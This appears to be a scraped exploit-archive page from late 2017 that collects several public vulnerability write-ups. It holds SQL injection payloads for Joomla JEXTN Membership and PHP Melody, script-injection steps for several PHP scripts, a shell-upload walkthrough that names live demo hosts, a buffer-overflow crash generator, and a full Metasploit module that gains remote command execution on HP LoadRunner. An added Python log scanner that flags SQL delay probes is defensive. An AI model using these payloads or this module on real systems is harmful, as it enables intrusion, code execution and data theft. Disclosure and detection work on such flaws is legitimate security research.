Joomla! JEXTN Membership 3.1.0 SQL Injection

Posted Dec 31, 2017
Authored by Bilal Kardadou

Joomla! JEXTN Membership component version 3.1.0 suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection
MD5 | 5f1419e50ed85b94dd410fc19bfd6d79
################################################
#Title: Joomla! JEXTN Membership 3.1.0 - SQL injection
#Credit: Bilal KARDADOU
#Vendor: http://www.jextn.com
#URL: https://extensions.joomla.org/extensions/extension/e-commerce/membership-a-subscriptions/jextn-membership/
#Product: 'Joomla! JEXTN Membership 3.1.0'
#Developer: jextn.com
#Last updated: Jan 05 2016
#Compatibility: 3.X
#Type: Paid download
################################################
#
# 1-GET -p [planid]
#
#
# http://127.0.0.1/joomla/index.php?option=com_jemembership&view=plans&task=plans.getSubscriptionplans&planid=6[SQLI]
#
# 2-POST -p [subscription1_periods]
#
# http://127.0.0.1/joomla/index.php/my-profile?view=registration
#
# subscription1_periods=2[SQLI]
#
# 3-POST -p [period_name]
#
#
# http://demo01.jextn.com/membership-demo/index.php/my-profile?view=registration
#
# period_name=2[SQLI]
#
# PoC:
# https://prnt.sc/hukhde
# https://prnt.sc/hukhue
# https://prnt.sc/huki0n
# https://prnt.sc/huki61
#
#Greetz to imad teb bernoussi lmkalkhine
# Bilal KARDADOU - https://www.linkedin.com/in/kardadou/
################################################

Easy Web Grabber 1.0.0 Cross Site Scripting

# Exploit Title: Easy Web Grabber PHP – xss
# Google Dork: N/A
# Date: 2017/31/12
# Exploit Author: ShanoWeb
# Author Mail : Mr[dot]Net2Net[at]Gmail[dot]com
# Vendor Homepage: https://www.codester.com/risioja
# Software Buy: https://www.codester.com/items/5292/easy-web-grabber-php
# Demo: http://winnky.000webhostapp.com/
# Version: 1.0
# Tested on: Win7 x64, Kali Linux x64
# Exploit :

Hi 2 All
1. go to Projects page:
2. click to “Create new project”
3. insert to textbox “Project title:” -> <script>alert(document.cookie);</script> or <script>alert(/ShanoWeb/);</script>
4. click to SUBMIT …

😀

./
|=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-|
| Find and patch bug in your website and system|
| Contact : Mr[dot]Net2Net[at]Gmail[dot]com |
|=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-|

|=============================================================|
/————————————————————-\
| My Message To |
\————————————————————-/
|= [!] Make Love,Not War!. Peace No War!
|= [!] We Are One!
|= [!] We are Legion,We do not Forgive,We Do not Forge
|= [!] We Love All Children from Palestine
|=============================================================|

PHP Melody 2.7.1 SQL Injection

# Exploit Title: PHP Melody v2.7.1 - SQL Injection
# Date: 30/12/2017
# Exploit Author: Ahmad Mahfouz
# Contact: http://twitter.com/eln1x
# Vendor Homepage: http://www.phpsugar.com/ Buy http://www.phpsugar.com/phpmelody_order.html
# Version: 2.7.1
# Tested on: Mac OS
#
# SQL Injection Type: time-based blind
# Parameter: playlist
# Page: ajax.php
# URL: http://target.com/ajax.php?p=video&do=getplayer&vid=[VALID_VIDO_ID]&aid=1&player=detail&playlist=[SQLi]

GET /ajax.php?p=video&do=getplayer&vid=randomid&aid=1&player=detail&playlist='+(select*from(select(sleep(20)))a)+' HTTP/1.1
Host: localhost
Accept: text/html, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
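
Added example (not part of the original advisory or of PHP Melody): a defender-side Python check that scans web access-log lines for the request shape shown above. It goes beyond the one request: any query parameter carrying a SQL delay function is flagged, and the playlist and planid parameters named on this page are checked against value shapes that are assumptions about legitimate traffic. The log lines are constructed samples.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Delay primitives typical of time-based blind SQL injection probes.
DELAY_RE = re.compile(r"\b(?:sleep|benchmark|pg_sleep)\s*\(|\bwaitfor\s+delay\b", re.I)
# Request line of a combined-format access-log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
# (script, parameter) pairs named on this page. The value shapes are
# assumptions about legitimate traffic, not vendor documentation.
EXPECTED = {
    ("ajax.php", "playlist"): re.compile(r"\w*"),
    ("index.php", "planid"): re.compile(r"\d+"),
}

def suspicious_params(log_line):
    """Return [(script, parameter, reason)] for one access-log line."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    script = url.path.rsplit("/", 1)[-1]
    findings = []
    # parse_qs percent-decodes and maps '+' to a space, as the server would.
    for name, values in parse_qs(url.query, keep_blank_values=True).items():
        for value in values:
            shape = EXPECTED.get((script, name))
            if DELAY_RE.search(value):
                findings.append((script, name, "time-delay function"))
            elif shape and not shape.fullmatch(value):
                findings.append((script, name, "unexpected value shape"))
    return findings

def scan(lines):
    """Flatten the findings for every line of a log."""
    return [hit for line in lines for hit in suspicious_params(line)]

# Constructed sample log (documentation IP range, made-up timestamps).
SAMPLE_LOG = [
    '203.0.113.5 - - [30/Dec/2017:10:00:01 +0000] "GET /ajax.php?p=video&do=getplayer'
    "&vid=randomid&aid=1&player=detail&playlist='+(select*from(select(sleep(20)))a)+'"
    ' HTTP/1.1" 200 512',
    '203.0.113.9 - - [30/Dec/2017:10:00:05 +0000] "GET /ajax.php?p=video&do=getplayer'
    '&vid=randomid&aid=1&player=detail&playlist= HTTP/1.1" 200 498',
    '203.0.113.5 - - [30/Dec/2017:10:01:12 +0000] "GET /joomla/index.php?option='
    'com_jemembership&view=plans&task=plans.getSubscriptionplans&planid=6%27 HTTP/1.1" 500 0',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

POST parameters such as subscription1_periods and period_name do not appear in access logs, so the same check would need request-body visibility, for example in a WAF or in the application itself.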

D3DGear 5.00 Build 2175 Buffer Overflow

#!/usr/bin/python

#
# Exploit Author: bzyo
# Twitter: @bzyo_
# Exploit Title: D3DGear 5.00 Build 2175 - Buffer Overflow
# Date: 07-11-2017
# Vulnerable Software: D3DGear 5.00 Build 2175
# Vendor Homepage: http://www.d3dgear.com/
# Version: 5.00 Build 2175
# Software Link: http://www.d3dgear.com/products.htm
# Tested On: Windows 7 x86
#
#
# PoC: generate crash.txt, open program, select broadcast, paste crash.txt contents in stream key
#
# app crashes; 00420042 Pointer to next SEH record; no eip overwrite; one unicode ppr pointer
#

file = "crash.txt"

buffer = "A"* 1284 + "B"*4
writeFile = open (file, "w")
writeFile.write( buffer )
writeFile.close()

Chatting System PHP Ajax MySQL JavaScript 1.0 Shell Upload

# Exploit Title: Chatting System PHP Ajax MySQL JavaScript – Remote Shell Upload
# Google Dork: N/A
# Date: 2017/31/12
# Exploit Author: ShanoWeb
# Author Mail : Mr[dot]Net2Net[at]Gmail[dot]com
# Vendor Homepage: https://www.codester.com/IngeniousDeveloper
# Software Buy: https://www.codester.com/items/5477/chatting-system-php-ajax-mysql-javascript
# Demo: http://chat.yourphpscript.com/view/login.php
# Version: 1.0
# Tested on: Win7 x64, Kali Linux x64
# Exploit :

Hi 2 All
1. go to http:[site]/view/login.php
2. Click to New User
3. insert to all textbox your data
4. select your shell.php in Profile Picture .
5. in firefox browser , click right and press “Q” on the keyboard or click to Inspect Element.
6. find in code Sing Up and remove disabled="disabled" in Button tag.
7. Click to Sing Up.
8. Login to your page and “View Page Source” .
9. Ctrl+F to find “User Pic”
10. your shell uploaded : http://[site]/uploads/[ex].php
11. dem0: http://chat.yourphpscript.com/uploads/20171230114001.php

😀


Auto Generate Data Sample 1.0 Cross Site Scripting

# Exploit Title: Auto Generate Data Sample PHP – xss
# Google Dork: N/A
# Date: 2017/31/12
# Exploit Author: ShanoWeb
# Author Mail : Mr[dot]Net2Net[at]Gmail[dot]com
# Vendor Homepage: https://www.codester.com/niagawebster
# Software Buy: https://www.codester.com/items/5580/auto-generate-data-sample-php
# Demo: http://generator.niagawebster.com/
# Version: 1.0
# Tested on: Win7 x64, Kali Linux x64
# Exploit :

Hi 2 All
1. go to index page:
2. Create Number Of Rows 1*1
3. insert to textbox “Customize Data Required – Column 1 : ” -> <script>alert(document.cookie);</script> or <script>alert(/ShanoWeb/);</script>
4. click to Generate Data …

😀


Chatting System PHP Ajax MySQL JavaScript 1.0 Cross Site Scripting

# Exploit Title: Chatting System PHP Ajax MySQL JavaScript – xss
# Google Dork: N/A
# Date: 2017/31/12
# Exploit Author: ShanoWeb
# Author Mail : Mr[dot]Net2Net[at]Gmail[dot]com
# Vendor Homepage: https://www.codester.com/IngeniousDeveloper
# Software Buy: https://www.codester.com/items/5477/chatting-system-php-ajax-mysql-javascript
# Demo: http://chat.yourphpscript.com/view/login.php
# Version: 1.0
# Tested on: Win7 x64, Kali Linux x64
# Exploit :

Hi 2 All
1. go to http:[site]/view/login.php
2. Click to New User
3. insert to textbox “Full Name” Or “Address” -> <script>alert(document.cookie);</script> or <script>alert(/ShanoWeb/);</script>
4. insert other textbox…
5. click to Sing Up
6. Login to your page .

😀


Photo Fusion 1.0 Cross Site Scripting

# Exploit Title: Photo Fusion – Free Stock Photos Script – Xss
# Google Dork: N/A
# Date: 2017/31/12
# Exploit Author: ShanoWeb
# Author Mail : Mr[dot]Net2Net[at]Gmail[dot]com
# Vendor Homepage: https://codecanyon.net/user/teamworktec
# Software Buy: https://codecanyon.net/item/photo-fusion-free-stock-photos-script/20115244
# Demo: http://sportsgrand.com/demo/photo_fusion
# Version: 1.0
# Tested on: Win7 x64, Kali Linux x64
# Exploit :

Hi 2 All
1. go to http://[site]/register
2. register
3. login in to page
4. Go to http://[site]/latest , click to ever post.
5. insert to textbox “Comments” -> <script>alert(/ShanoWeb/);</script>
6. Click to send.

Laravel 5.4.x :D:D


Wikipedia Search Engine 1.0 Cross Site Scripting

# Exploit Title: Wikipedia Search Engine PHP – xss
# Google Dork: N/A
# Date: 2017/31/12
# Exploit Author: ShanoWeb
# Author Mail : Mr[dot]Net2Net[at]Gmail[dot]com
# Vendor Homepage: https://www.codester.com/niagawebster
# Software Buy: https://www.codester.com/items/5328/wikipedia-search-engine-php
# Demo: http://wikipedia.niagawebster.com/index.php
# Version: 1.0
# Tested on: Win7 x64, Kali Linux x64
# Exploit :

Hi 2 All
1. go to index page:
2. insert to textbox “Search and Download On Wiki” -> <script>alert(document.cookie);</script> or <script>alert(/ShanoWeb/);</script>
3. click to search now …

😀


HP Mercury LoadRunner Agent magentproc.exe Remote Command Execution

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::CmdStager

  def initialize(info={})
    super(update_info(info,
      'Name' => "HP Mercury LoadRunner Agent magentproc.exe Remote Command Execution",
      'Description' => %q{
        This module exploits a remote command execution vulnerability in HP LoadRunner before 9.50
        and also HP Performance Center before 9.50. HP LoadRunner 12.53 and other versions are
        also most likely vulnerable if the (non-default) SSL option is turned off.
        By sending a specially crafted packet, an attacker can execute commands remotely.
        The service is vulnerable provided the Secure Channel feature is disabled (default).
      },
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'Unknown', # Original discovery # From Tenable Network Security
          'aushack' # metasploit module
        ],
      'References' =>
        [
          ['CVE', '2010-1549'],
          ['ZDI', '10-080'],
          ['BID', '39965'],
          ['URL', 'https://support.hpe.com/hpsc/doc/public/display?docId=c00912968']
        ],
      'Payload' => { 'BadChars' => "\x0d\x0a\x00" },
      'Platform' => 'win',
      'Targets' =>
        [
          # Note: software reportedly supports Linux - may also be vulnerable.
          ['Windows (Dropper)',
            'Platform' => 'win',
            'Arch' => [ARCH_X86, ARCH_X64]
          ],
        ],
      'Privileged' => false,
      'Stance' => Msf::Exploit::Stance::Aggressive,
      'DisclosureDate' => 'May 06 2010',
      'DefaultTarget' => 0))

    register_options([Opt::RPORT(54345)])
  end

  def autofilter
    true
  end

  def execute_command(cmd, _opts = {})
    guid = Rex::Text.encode_base64(Rex::Text.rand_text_alphanumeric(17))
    randstr = Rex::Text.rand_text_alpha(16)
    server_name = Rex::Text.rand_text_alpha(7)
    server_ip = datastore['LHOST']
    server_port = Rex::Text.rand_text_numeric(4)
    # If linux is one day supported, cmd1 = /bin/sh and cmd2 = -c cmd
    cmd1 = "C:\\Windows\\system32\\cmd.exe"
    cmd2 = "/C \"#{cmd}\""

    pkt1 = [0x19].pack('N') + guid + '0'

    pkt2 = [0x6].pack('N') + [0x0].pack('N') + "(-server_type=8)(-server_name=#{server_name})(-server_full_name=#{server_name})"
    pkt2 << "(-server_ip_name=#{server_ip})(-server_port=#{server_port})(-server_fd_secondary=4)(-guid_identifier=#{guid})\x00\x00"
    pkt2 << [0x7530].pack('N')

    pkt3 = [4 + pkt2.length].pack('N') + pkt2

    pkt4 = [0x1c].pack('N') + [0x05].pack('N') + [0x01].pack('N') + randstr + pkt3

    pkt5 = [pkt4.length].pack('N') + pkt4

    pkt6 = [0x437].pack('N') + [0x0].pack('N') + [0x31].pack('N') + [1].pack('N') + [0x31000000].pack('N')
    pkt6 << [cmd1.length].pack('N') + cmd1 + "\x00" + [cmd2.length].pack('N') + cmd2 + [0x0].pack('N') + [0x0].pack('N')

    pkt7 = [4 + pkt6.length].pack('N') + pkt6

    pkt8 = [0x18].pack('N') + [0x04].pack('N') + randstr + pkt7

    pkt9 = [pkt8.length].pack('N') + pkt8

    sploit = pkt1 + pkt5 + pkt9

    connect
    sock.put(sploit)
    disconnect
  end

  def exploit
    print_status('Sending payload...')
    execute_cmdstager(linemax: 1500)
  end
end